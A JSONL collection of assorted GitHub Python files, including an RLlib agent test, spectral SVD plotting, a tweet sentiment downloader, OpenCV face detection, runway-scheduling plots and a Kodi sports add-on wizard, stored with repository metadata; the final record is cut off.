install_requires=open('requirements.txt').read().split(),\n scripts=['scripts/jimmy'],\n classifiers=[\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Software Development :: Code Generators',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Intended Audience :: Developers',\n 'Environment :: Console'\n ],\n keywords='oozie workflows code generation emr aws'\n)\n","repo_name":"scm-spain/slippin-jimmy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"42681378843","text":"\nimport os\nimport numpy as np\nimport pickle\nimport time\n\nimport ray\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.agents.ppo.ppo import DEFAULT_CONFIG\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy as LoadPolicy\ntorch, nn = try_import_torch()\n\nfrom MACA.env.cannon_reconn_hierarical import CannonReconnHieraricalEnv\nfrom MACA.utils.setting import get_args\nfrom MACA.render.gif_generator import gif_generate\n\nclass Agent():\n def __init__(self, load_path, observation_space, action_space):\n self.detector_prep = ModelCatalog.get_preprocessor_for_space(observation_space[0])\n self.fighter_prep = ModelCatalog.get_preprocessor_for_space(observation_space[1])\n detector_flat_obs_space = self.detector_prep.observation_space\n fighter_flat_obs_space = self.fighter_prep.observation_space\n\n config = DEFAULT_CONFIG.copy()\n self.args = get_args()\n\n self.policies = {}\n self.policies['0'] = LoadPolicy(detector_flat_obs_space, action_space[0], config)\n self.policies['1'] = LoadPolicy(fighter_flat_obs_space, action_space[1], config)\n\n objs = pickle.load(open(load_path, \"rb\"))\n objs = pickle.loads(objs[\"worker\"])\n state = objs[\"state\"]\n\n for i in range(0, 2):\n state[str(i)].pop('_optimizer_variables')\n self.policies[str(i)].set_weights(state[str(i)])\n\n def act(self, obs): \n act_dict = {}\n \n for i in range(1, 3):\n obs_i = self.detector_prep.transform(obs[str(i)])\n act = self.policies['0'].compute_actions([obs_i], explore=False)\n act = act[0][0]\n\n act = np.clip(act, -self.args.fighter.turn_range, self.args.fighter.turn_range)\n act_dict[str(i)] = act\n\n for i in range(3, 8):\n obs_i = self.fighter_prep.transform(obs[str(i)])\n\n act = self.policies['1'].compute_actions([obs_i], explore=True)\n direct = act[0][0]\n attack = act[0][1]['attack'][0]\n\n direct = np.clip(direct, -self.args.fighter.turn_range, self.args.fighter.turn_range)\n act_dict[str(i)] = (direct, {'attack': attack})\n\n return act_dict\n\n\n\ndef main():\n cr_env = CannonReconnHieraricalEnv({'render': True})\n\n # 设定路径\n path = ''\n agent = Agent(path, cr_env.observation_spaces, cr_env.action_spaces)\n \n episode = 0\n while True:\n state = cr_env.reset()\n done = False\n total_reward = 0.\n episode += 1\n step = 0\n total_damage = 0\n while not done:\n time.sleep(0.02)\n action = agent.act(state)\n\n state, reward, dones, info = cr_env.step(action)\n cr_env.render(save_pic=True)\n done = dones['__all__']\n\n total_reward += sum([reward[str(i)] for i in range(1, 6)])\n total_damage += sum([item[1] for item in info['1']['ally_damage'].items()])\n\n step += 1\n\n print(\"episode: {}, time_step: {}, total_reward: {}, total_damage: {}\".format(episode, step, total_reward, total_damage))\n gif_generate('demo.gif')\n break\n\n\nif __name__ == '__main__':\n main()","repo_name":"simsimiSION/MACA-2D","sub_path":"test_cr_rllib.py","file_name":"test_cr_rllib.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"24233367069","text":"from os import path\nimport pandas as pd\nfrom preprocessing import preprocess\nfrom visualisation.visualisation import freq_barplot, unigrams, bigrams, trigrams, sentiment_hist\nfrom ner_flair import ner\n\npd.options.mode.chained_assignment = None # default='warn'\n\npath_a = 'data/t_kjv.csv' # path to the bible csv\ndf = pd.read_csv(path_a)\ndf.head()\nprint(\"number of rows(verses): \" + format(df.shape[0]))\n\npath_b = 'data/key_english.csv' # path to the book specification csv\ndf_b = pd.read_csv(path_b)\ndf_b.head()\nprint(\"number of rows(books): \" + format(df_b.shape[0]))\n\n# load or create the dataframe after preprocessing\nif path.exists(\"out.csv\"):\n df = pd.read_pickle(\"data\\out.pkl\")\nelse:\n df = preprocess(df, df_b)\n df = ner(df)\n\n# run the function calls below to get the visualisation\n\nfreq_barplot(df) # call function to create the frequencies barplot\n\nunigrams(df)\n\nbigrams(df)\n\ntrigrams(df)\n\nsentiment_hist(df)","repo_name":"christoskaparakis/IRTM_Bible","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34333275954","text":"\"\"\"\nExperiment with SVD using SOAP-2 data in the Ca H & K line region.\n\nCreated 2023-05-26 by Tom Loredo\nBased on a script from May 2017, subsequently revised in 2019, 2020, 2021.\n\"\"\"\n\nimport numpy as np\nfrom numpy import *\nimport scipy\nfrom scipy.sparse import linalg\nimport matplotlib as mpl\nfrom matplotlib.pyplot import *\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import PolyCollection\nfrom matplotlib import colors as mcolors\n\nimport colorcet as cc\n\nfrom soap2_data import prep_data, fetch_ca_spec, fetch_full_spec\nfrom outerproduct import OuterProduct\n\n\n# This imports Tom's plotting defaults\ntry:\n import myplot\n from myplot import ipy_ion, close_all, csavefig\n ipy_ion()\n #myplot.tex_on()\n csavefig.save = False\nexcept ImportError:\n ion()\n\n# If having trouble with plots, try switching the backend:\n# matplotlib.use('TkAgg')\n# mpl.style.use('classic')\n\n\n# Fetch the data:\nfetcher = prep_data('SOAP2-1Spot')\n\n# Full spectrum, just 4 phases:\nfull_spec = fetch_full_spec(fetcher)\n\n# Zoomed into the calcium H & K line region, 100 phases:\nca_spec = fetch_ca_spec(fetcher)\n\n\n# We'll use the many-phase zoomed-in spectrum here,\n# aliased so we can swap in other spectra later.\ndynspec = ca_spec\n\n# Compute average spectrum, and an \"image\" of the avg-subtracted \n# spectra (with time as the vertical dimension), rescaled.\navg = dynspec.active.sum(0) / dynspec.nphases\ndelta_image = dynspec.active - avg\nl, u = delta_image.min(), delta_image.max()\nll, lu = dynspec.lambdas[0], dynspec.lambdas[-1]\ndelta_image = (delta_image - l)/(u - l)\n\n\n# Lines in this region of the spectrum:\n# For info on air/vacuum conversino, see:\n# Spectra - SDSS-III\n# http://www.sdss3.org/dr8/spectro/spectra.php\n# Atomic Data for Resonance Absorption Lines... - ADS\n# https://ui.adsabs.harvard.edu/abs/1991ApJS...77..119M/abstract\n# Ca II K line, air & vacuum:\nCaK = [3933.663, 3934.777]\n# Ca II H line, air & vacuum:\nCaH = [3968.468, 3969.591]\nlines = CaK + CaH\nlines = (CaK[0], CaH[0]) # air only; appears to be what SOAP uses\n\n\n# Plot the quiet-star spectrum.\nif True:\n fig = figure('quiet-full', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Quiet Sun integrated spectrum')\n plot(dynspec.lambdas, dynspec.quiet, label='Integrated spectrum no activity at full resolution')\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Relative flux')\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n # Label vacuum lines:\n text(CaK[0]+.7, 6200, 'Ca II K', horizontalalignment='left',\n verticalalignment='top')\n text(CaH[0]+.7, 6200, 'Ca II H', horizontalalignment='left',\n verticalalignment='top')\n\n\n# Plot spectra at a few phases.\nif False:\n fig = figure('phases', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Selected phases')\n for i in range(0, dynspec.nphases, dynspec.nphases//4):\n plot(dynspec.lambdas, dynspec.active[i,:], label='$\\phi = {:0.2f}$'.format(dynspec.phases[i]),\n lw=1, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Relative flux')\n legend()\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n\n # Plot mean-subtracted spectra at a few phases.\n fig = figure('diff', figsize=(12,3.5))\n fig.subplots_adjust(left=.1, right=.9, bottom=0.21, top=.9)\n title('Mean-subtracted spectra')\n\n # If there are many phases, plot a subset.\n if dynspec.nphases >= 10:\n step = dynspec.nphases//10\n else:\n step = 1\n\n for i in range(0, dynspec.nphases, step):\n plot(dynspec.lambdas, dynspec.active[i,:] - avg, label='$\\phi = {:0.2f}$'.format(dynspec.phases[i]),\n lw=1.5, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel('Difference')\n legend()\n for line in lines:\n axvline(line, c='r', lw=.75, alpha=.5)\n\n\n# Try a waterfall-style plot of spectra at a few phases.\nif True:\n fig = figure(figsize=(8, 4))\n # This breaks after mpl-3.6; use add_subplot instead:\n # ax = fig.gca(projection='3d')\n ax = fig.add_subplot(projection='3d')\n\n verts = []\n\n # If there are many phases, plot a subset.\n if dynspec.nphases >= 10:\n step = dynspec.nphases//10\n else:\n step = 1\n\n ind = list(range(0, dynspec.nphases, step))\n zs = dynspec.phases[ind]\n y_l, y_u = 0., 0.\n for i, z in zip(ind, zs):\n # ys = dynspec.active[i,:] - avg\n ys = dynspec.active[i,:]\n y_l = min(y_l, ys.min())\n y_u = max(y_u, ys.max())\n # ys[0], ys[-1] = 0, 0\n verts.append(list(zip(dynspec.lambdas, ys)))\n\n def cc2(arg):\n return mcolors.to_rgba(arg, alpha=0.6)\n\n poly = PolyCollection(verts, facecolors=[cc2('r'), cc2('g'), cc2('b'),\n cc2('y')])\n poly.set_alpha(0.7)\n ax.add_collection3d(poly, zs=zs, zdir='y')\n\n ax.set_xlabel(r'$\\lambda$ ($\\AA$)')\n ax.set_xlim3d(dynspec.lambdas[0], dynspec.lambdas[-1])\n ax.set_ylabel('$\\phi$')\n ax.set_ylim3d(-.5, .5)\n ax.set_zlabel(r'$\\Delta$')\n ax.set_zlim3d(y_l, y_u)\n\n\n# Plot an image of the difference of spectra from the time-averaged spectrum.\n# *** Double-check the origin='lower' setting here (matches use in OuterProduct,\n# which was verified w/ test case).\nif False:\n if True: # larger labels\n rc('axes', labelsize=18)\n rc('xtick.major', pad=8)\n rc('xtick', labelsize=14)\n rc('ytick.major', pad=8)\n rc('ytick', labelsize=14)\n rc('figure.subplot', bottom=.19, top=.925)\n\n # fig = figure('diff-img', figsize=(12,5)) # orig size\n fig = figure('diff-img', figsize=(12,3.5)) # shorter for proposal\n imshow(delta_image, cmap=cc.cm.bwy_r, interpolation='nearest', aspect='auto',\n origin='lower', extent=(ll, lu, dynspec.phases[0], dynspec.phases[-1]))\n xlim(ll, lu)\n for line in lines:\n # axvline(line, c='r', lw=.75, alpha=.5)\n axvline(line, c='w', lw=1, alpha=.5)\n xlabel(r'$\\lambda$ ($\\AA$)')\n ylabel(\"Spot rotational phase\")\n title('Difference from time-averaged spectrum')\n\n # Zoomed for inset:\n # fig = figure('diff-img2', figsize=(12,5))\n fig = figure('diff-img2', figsize=(12,3.5))\n imshow(delta_image, cmap=cc.cm.bwy_r, interpolation='nearest', aspect='auto',\n origin='lower', extent=(ll, lu, dynspec.phases[0], dynspec.phases[-1]))\n xlim(ll, lu)\n for line in lines:\n # axvline(line, c='r', lw=.75, alpha=.5)\n axvline(line, c='w', lw=1, alpha=.5)\n xlim(3940., 3947.)\n ylim(-.25, .25)\n # xlabel(r'$\\lambda$ ($\\AA$)')\n #ylabel(\"Spot rotational phase\")\n # title('Difference from time-averaged spectrum')\n\n\n# Test of outer product grid alignment:\nif False:\n spec_x = linspace(1., 5., 5)\n spec_y = array([0., 1., 0., -1., 0.])\n temp_x = linspace(0., 10., 6)\n temp_y = array([-2., -1., 0., 1., 2., 1.])\n outer = OuterProduct(spec_x, spec_y, temp_x, temp_y)\n f5 = outer.plot()\n\n\n# Compute and plot evolving spectral components via SVD.\nif True:\n\n # Compute top 3 singular values and vectors; the largest singular value\n # has index 2 (i.e., they are increasing in s[:]).\n # U[phi,k] contains the phase basis function for singular value # k\n # Vt[k,lambda] contains the wavelength basis function for singular value # k\n U, s, Vt = linalg.svds(delta_image, k=3)\n\n outer = OuterProduct(dynspec.lambdas, Vt[-1,:], dynspec.phases, U[:,-1])\n f1 = outer.plot(lines)\n f1.axes[1].set_title('1st singular value')\n\n outer = OuterProduct(dynspec.lambdas, Vt[-2,:], dynspec.phases, U[:,-2])\n # f2 = outer.plot(lines)\n f2 = outer.plot(lines, zoom=((3959.5, 3965.5), (-.24, .24)))\n f2.axes[1].set_title('2nd singular value')\n\n outer = OuterProduct(dynspec.lambdas, Vt[-3,:], dynspec.phases, U[:,-3])\n # f3 = outer.plot(lines)\n f3 = outer.plot(lines, zoom=((3946.5, 3950.), (-.24, .24)))\n f3.axes[1].set_title('3rd singular value')\n\n # *** DANGER: Changing xlim does not appear to affect the image as expected.\n # Just pass subsets of the data to zoom.\n if False:\n # Zoomed version of SVD3:\n outer = OuterProduct(dynspec.lambdas, Vt[-3,:], dynspec.phases, U[:,-3])\n f4 = outer.plot(lines)\n f4.axes[1].set_title('3rd singular value')\n xrng = (3946.5, 3950.)\n xrng = (3947.25, 3947.9)\n f4.axes[0].set_xlim(*xrng)\n f4.axes[1].set_xlim(*xrng)\n spec = dynspec.active[0,:]\n spec = spec/spec.max()\n l, u = Vt[-3,:].min(), Vt[-3,:].max()\n spec = spec*(u-l) + l\n f4.axes[1].plot(dynspec.lambdas, spec, 'g--', lw=1, alpha=.5)\n f4.axes[0].axvline(3948.05)\n f4.axes[1].axvline(3948.05)\n\n # Zoomed version of SVD3:\n i1, i2 = 7544, 7753 # very narrow region, for checking alignments\n i1, i2 = 7520, 7890\n lambdas = dynspec.lambdas[i1:i2]\n vvals = Vt[-3,i1:i2]\n outer = OuterProduct(lambdas, vvals, dynspec.phases, U[:,-3])\n f5 = outer.plot()\n spec = dynspec.active[0,:]\n spec = spec/spec.max()\n l, u = Vt[-3,:].min(), Vt[-3,:].max()\n # spec = spec*(u-l) + l # v. center the spec curve\n spec = 1.2*u*spec # keep spec curve > 0\n f5.axes[1].plot(dynspec.lambdas, spec, 'g--', lw=1, alpha=.5)\n f5.axes[1].axhline(0., ls='-', c='gray', lw=0.75)\n f5.axes[1].set_title('3rd singular value')\n","repo_name":"tloredo/SOAP2SpotSVDDemo","sub_path":"soap2_svd.py","file_name":"soap2_svd.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39617587360","text":"total = cont = totptous = minor = 0\ncheap = ''\nwhile True:\n product = str(input('Product name: '))\n price = float(input('Price: R$'))\n cont += 1\n total += price\n if price > 1000:\n totptous += 1\n if cont == 1 or price < minor:\n minor = price\n cheap = product\n res = ''\n while res not in 'SN':\n res = str(input('Deseja continuar? [S/N] '))\n if res == 'N':\n break\nprint(f'Total purchase amount: R${total}')\nprint(f'There is {totptous} over R$1.000,00.')\nprint(f\"The cheapest product is {cheap} and it's cost R${minor:,2f}\")\n","repo_name":"monteirosamuel74/PythonCV","sub_path":"aula015pararwhile/des070estatistica.py","file_name":"des070estatistica.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10597426202","text":"def main():\n while True:\n user = input(\"Fraction: \")\n result1 = convert(user)\n result2 = gauge(result1)\n if result2 is not None:\n print(result2)\n break\n\ndef convert(fraction):\n try:\n x, y = fraction.split(\"/\")\n x = int(x)\n y = int(y)\n result = x / y\n result = float(result)\n return round(result * 100)\n except ValueError:\n raise ValueError(\"Invalid fraction format\")\n except ZeroDivisionError:\n raise ZeroDivisionError(\"devision by zero\")\n\ndef gauge(percentage):\n if 0 <= percentage < 10:\n return \"E\"\n elif 99 <= percentage <= 100:\n return \"F\"\n elif 10 <= percentage < 99 :\n res = round(percentage)\n return str(f\"{res}%\")\n else:\n return None\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Guram12/CS50_Problems","sub_path":"31_test_fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10929022414","text":"# Libraries\nimport tweepy\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom tweepy import OAuthHandler\nimport datetime, time\nfrom twitter_credentials import consumer_key, consumer_secret, access_token, access_token_secret\nimport csv\nfrom textblob import TextBlob\nimport sqlite3\nimport json\n\n#Authenticate Twitter; Return API object. \nclass TwitterAuthenticator():\n\n def twitter_auth(self):\n global auth\n global api\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = API(auth)\n return api\n\n# Extract input file \nclass FileOps():\n\n def strip_file(self):\n global username\n username = []\n\n with open(\"user_list.txt\", \"r\") as f:\n targets_list = f.readlines()\n\n for i in targets_list:\n username.append(i.strip('\\n'))\n print(username)\n\nclass Tweet():\n\n # Data on the tweet tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\"), self.sentiment(tweet.text)\n def __init__(self, tweet_id, text, sentiment):\n self.tweet_id = tweet_id\n # self.created_at = created_at\n self.text = text\n self.sentiment = sentiment\n\n # Inserting that data into the DB\n def insertTweet(self):\n\n c.execute(\"INSERT INTO tweets (tweet_id, text, sentiment) VALUES (?, ?, ?)\",\n (self.tweet_id, self.text, self.sentiment))\n conn.commit()\n\n# Download tweets\nclass PullTweets():\n \n def sentiment(self, text):\n return TextBlob(text).sentiment\n\n def get_tweets(self, screen_name): \n\n print(\"downloading tweets ...\")\n global tweets\n tweets = []\n\n fresh_tweets = api.user_timeline(screen_name, count=5) \n oldest_id = fresh_tweets[-1].id\n\n while len(fresh_tweets) > 0:\n fresh_tweets = api.user_timeline(screen_name, count=5, since_id = oldest_id) \n tweets.extend(fresh_tweets)\n oldest_id = tweets[-1].id\n print(f\"{len(tweets)} tweets downloaded ...\")\n\n out_tweets = [[tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\"), self.sentiment(tweet.text)] for tweet in tweets]\n\n for i in tweets:\n tweet = Tweet(str(i.id_str), str(i.text.encode('utf-8')), str(self.sentiment(i.text)))\n tweet.insertTweet()\n\n with open(f'{screen_name} tweets.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"id\",\"created_at\",\"text\",\"sentiment\"])\n writer.writerows(out_tweets)\n\n def all_tweets(self):\n \n for i in username:\n self.get_tweets(i)\n\n\n# Execution \nif __name__ == '__main__':\n\n # Create Table\n conn = sqlite3.connect('twitter.db')\n c = conn.cursor() \n c.execute('''CREATE TABLE tweets\n (tweet_id text,\n text text,\n sentiment text)''')\n conn.commit()\n conn.close()\n\n # Initiate DB\n conn = sqlite3.connect('twitter.db')\n c = conn.cursor()\n\n twitter_authenticator = TwitterAuthenticator()\n twitter_authenticator.twitter_auth()\n\n file_ops = FileOps()\n file_ops.strip_file()\n\n pull_tweets = PullTweets()\n pull_tweets.all_tweets()\n\n\n","repo_name":"jshepp27/MultiPulz","sub_path":"MultiPulz.py","file_name":"MultiPulz.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22500097763","text":"import numpy as np\nimport cv2\nfrom functions import *\n\ndef manual_face_detector(img: np.ndarray) -> list:\n img_copy = img.copy()\n vertex_list = []\n def select_faces(event,x,y,flags,param):\n if event == cv2.EVENT_LBUTTONDOWN:\n vertex_list.append((x,y))\n if(len(vertex_list)%2 == 0):\n a = vertex_list[-2]\n b = vertex_list[-1]\n _ = cv2.rectangle(img_copy,(a[0],a[1]),(b[0],b[1]),(255,0,0),2)\n else:\n _ = cv2.circle(img_copy,(vertex_list[-1][0],vertex_list[-1][1]),1,(255,0,0))\n cv2.namedWindow(\"Face Selection\")\n cv2.setMouseCallback(\"Face Selection\",select_faces)\n while(1):\n cv2.imshow(\"Face Selection\",img_copy)\n k = cv2.waitKey(1)\n if k == 122 and len(vertex_list) != 0:\n vertex_list.pop()\n img_copy = img.copy()\n for x,y in zip(vertex_list[0::2],vertex_list[1::2]):\n _ = cv2.rectangle(img_copy,x,y,(255,0,0),2)\n if len(vertex_list)%2 == 1:\n _ = cv2.circle(img_copy,(vertex_list[-1][0],vertex_list[-1][1]),1,(255,0,0))\n continue\n if k != -1:\n break\n cv2.destroyWindow(\"Face Selection\")\n rectangle_list = [(x[0],x[1],y[0]-x[0],y[1]-x[1]) for x,y in zip(vertex_list[0::2],vertex_list[1::2])]\n return rectangle_list\n\ndef viola_jones(img: np.ndarray) -> list:\n face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces_xywh = face_cascade.detectMultiScale(gray,scaleFactor=1.05,minNeighbors=6,minSize=(30,30))\n return faces_xywh.tolist() if len(faces_xywh) > 0 else []\n\ndef show_detected_face(img: np.ndarray,xywh: list,title=[]) -> None:\n img_copy = []\n for coordinates in xywh:\n img_copy.append(img.copy())\n for (x,y,w,h) in coordinates:\n _ = cv2.rectangle(img_copy[-1],(x,y),(x+w,y+h),(255,0,0),2)\n return show_multiple_img(title,img_copy,0)\n\ndef get_face_roi(img: np.ndarray,xywh: list) -> list:\n face_roi = []\n for i in xywh:\n p_x,p_y,q_x,q_y = get_coordinates(i)\n face_roi.append((i,img[p_y:q_y,p_x:q_x].copy()))\n return face_roi","repo_name":"Simon-zys/COL-783-Assignments","sub_path":"Assignment 1/CAPE/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12087008321","text":"# Written by Timothy van der Valk. Modelling B.\n\n# Collection of plotting functions for all possible data sets used in the model.\n# Call desired plot_* functions and finally call plot_show to show all the \n# selected plots at once.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom solver import Solution\n\n\ndef plot_sol_deviation(sol: Solution):\n # Plot bar chart with deviation from target arrival time for each aircraft.\n\n n = sol.data_set.num_aircraft\n xlist = np.arange(n)\n ylist = []\n for i in range(n):\n ylist.append(sol.arrival_times[i] - sol.data_set.target[i]) \n pass\n\n plt.figure(\"Deviation chart\")\n plt.title(\"Deviation from target times of %d aircraft\" % sol.data_set.num_aircraft)\n plt.xlabel(\"Plane ID\")\n plt.ylabel(\"Deviation from target\")\n\n plt.axhline(y=0, c=\"gray\")\n plt.axhline(int(sol.get_deviation()), c=\"red\")\n plt.bar(xlist, ylist, width=0.5)\n\n\ndef plot_sol_events(sol: Solution):\n # Plots the given runway allocation problem by target time and given time.\n\n xlist = sol.arrival_times\n xlist2 = sol.data_set.target\n ylist = [ 0 ] * len(xlist)\n\n plt.figure(\"Event chart\")\n plt.title(\"Arrival and target times of %d aircraft\" % sol.data_set.num_aircraft)\n plt.xlabel(\"Desired (red) and actual (blue) arrival times\")\n\n plt.axhline(y=0, c=\"gray\")\n plt.plot(xlist2, ylist, \"r|\", ms=60, mew=2)\n plt.plot(xlist, ylist, 'bo', ms=7)\n \n # Hide Y axis.\n plt.gca().get_yaxis().set_visible(False)\n\n\ndef plot_sol_intervals(sol: Solution):\n # Plots the given arrival intervals for all aircraft with target and given\n # arrival times. This is the largest plot.\n\n target_xlist = []\n target_ylist = []\n given_xlist = []\n \n xlist=[]\n ylist=[]\n n = sol.data_set.num_aircraft\n for i in range(n):\n xlist.append(sol.data_set.earliest[i]) \n xlist.append(sol.data_set.latest[i]) \n xlist.append(None)\n\n yval = i\n ylist.append(yval)\n ylist.append(yval)\n ylist.append(None)\n\n target_xlist.append(sol.data_set.target[i])\n target_ylist.append(yval)\n given_xlist.append(sol.arrival_times[i])\n\n # Plot three different things. Intervals, target and given.\n plt.figure(\"Interval chart\")\n plt.title(\"Arrival windows and arrival times of %d aircraft\" % n)\n plt.ylabel(\"Plane ID\")\n plt.xlabel(\"Timespan\")\n\n plt.plot(xlist, ylist, 'gray')\n plt.plot(target_xlist, target_ylist, 'r^')\n plt.plot(given_xlist, target_ylist, 'go', ms=5)\n\n # Place ID on Y axis for all planes 0, 1, 2, 3 etc.\n plt.yticks(np.arange(0, n))\n\n\ndef plot_show():\n # Show plots to the screen.\n plt.show()\n","repo_name":"parcevval/airplane-math","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34346615592","text":"import xbmcaddon\nimport xbmcgui\nimport xbmc\n\ndialog = xbmcgui.Dialog()\naddon_id = 'plugin.video.sports'\n_addon = xbmcaddon.Addon(id=addon_id)\niLengths = ['1', '2', '3', '4', '5', '10', '15', '30', '60']\nnLengths = ['5', '6', '7', '8', '9', '10', '15', '30']\ndTypes = ['Individual Game Notifications', 'Ticker Notifications']\nnTypes = {'Basketball':{'Upcoming Game':'nba_upcominggame', 'Game Started':'nba_startofgame', 'Lead Change':'nba_leadchange',\n 'Period Change':'nba_periodchange', 'Game Ended':'nba_endofgame'},\n 'Ice Hockey':{'Upcoming Game':'nhl_upcominggame', 'Game Started':'nhl_startofgame', 'Score Change':'nhl_scorechange',\n 'Period Change':'nhl_periodchange', 'Game Ended':'nhl_endofgame'},\n 'Baseball': {'Upcoming Game':'mlb_upcominggame', 'Game Started':'mlb_startofgame', 'Score Change':'mlb_scorechange',\n 'Inning Change':'mlb_inningchange', 'Game Ended':'mlb_endofgame'},\n 'Football': {'Upcoming Game':'nfl_upcominggame', 'Game Started':'nfl_startofgame', 'Score Change':'nfl_scorechange',\n 'Inning Change':'nfl_inningchange', 'Game Ended':'nfl_endofgame'}}\nsports = {'Basketball':'nba_enable', 'Ice Hockey':'nhl_enable', 'Baseball':'mlb_enable', 'Football':'football_enable'}\n\ndef load(first_time):\n if not first_time:\n resetConfirmed = dialog.yesno('Sports Guru', 'Continuing with the set-up will wipe out your existing preferences. [B]Are you sure?[/B]')\n if resetConfirmed:\n try:\n import shutil\n current_settings = xbmc.translatePath('special://userdata/addon_data/plugin.video.sports')\n shutil.rmtree(current_settings)\n xbmc.executebuiltin('Container.Update')\n except:\n pass\n else:\n return\n else:\n _addon.setSetting('firstrun', 'false')\n\n ok = dialog.ok('Sports Guru', 'Welcome to the Sports Guru set-up wizard! Click Ok to begin.')\n if ok:\n wantnotifications = dialog.yesno('Sports Guru', 'Do you want to use the notifications service the add-on offers?')\n if wantnotifications:\n _addon.setSetting('allow', 'true')\n\n ok = dialog.ok('Sports Guru', 'Great! First things first, please select Update Interval.\\n' + \\\n '[B]Note:[/B] It\\'s best to stick with the default 1 minute. ' + \\\n 'However, shorter intervals may have an adverse effect on low-spec devices (causing lag).')\n howoften = dialog.select('Sports Guru', iLengths)\n if howoften > -1:\n _addon.setSetting('interval', iLengths[howoften])\n ok = dialog.ok('Sports Guru', 'Second, please select the notification format you prefer.')\n whatkind = dialog.select('Sports Guru', dTypes)\n if whatkind > -1:\n ok = dialog.ok('Sports Guru', 'Next please select the notification timeout length.')\n nLength = dialog.select('Sports Guru - Notification Timeout (seconds)', nLengths)\n if whatkind == 0:\n _addon.setSetting('multi', 'false')\n _addon.setSetting('Ntimeout', nLengths[nLength])\n elif whatkind == 1:\n _addon.setSetting('multi', 'true')\n _addon.setSetting('Ttimeout', nLengths[nLength])\n else:\n _addon.setSetting('allow', 'false')\n return\n ok = dialog.ok('Sports Guru', 'Alright, I\\'ve set your update interval to %s minute(s) ' % str(iLengths[howoften]) + \\\n 'and notification preference to %s. Now let\\'s move onto the sports you want notifications for.' % dTypes[whatkind])\n whichsports = dialog.multiselect('Choose your Sports', list(sports.keys()))\n if whichsports is not None:\n for sIndex, key in enumerate(sports.keys()):\n s = list(sports.keys())[sIndex]\n sportId = sports[s]\n if sIndex in whichsports:\n _addon.setSetting(sportId, 'true')\n #Ask what types of notification they want for this sport\n ok = dialog.ok('Sports Guru', 'Please select the notification types you want for %s.' % s)\n whichnotifications = dialog.multiselect('Choose Notification Types', list(nTypes[s].keys()))\n if whichnotifications is not None:\n for nIndex, key in enumerate(nTypes[s].keys()):\n n = list(nTypes[s].keys())[nIndex]\n settingId = nTypes[s][n]\n if nIndex in whichnotifications:\n _addon.setSetting(settingId, 'true')\n else:\n _addon.setSetting(settingId, 'false')\n else:\n _addon.setSetting('allow', 'false')\n return\n\n ok = dialog.ok('Sports Guru', 'Click Ok to select the teams you want notifications for in the [B]%s[/B] League' % sportId.split('_')[0].upper())\n from . import manager\n manager.load(sportId.split('_')[0])\n else:\n _addon.setSetting(sportId, 'false')\n #restart = dialog.ok('Sports Guru', 'Set-up is now complete. For your settings to take effect please restart Kodi.')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n else:\n _addon.setSetting('allow', 'false')\n","repo_name":"skydrome/plugin.video.sports","sub_path":"resources/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"17866150519","text":"def taumBday(b, w, bc, wc, z):\n # Write your code here\n if bc < wc and bc + z < wc:\n wc = bc + z\n elif wc < bc and wc + z < bc:\n bc = wc + z\n\n return b * bc + w * 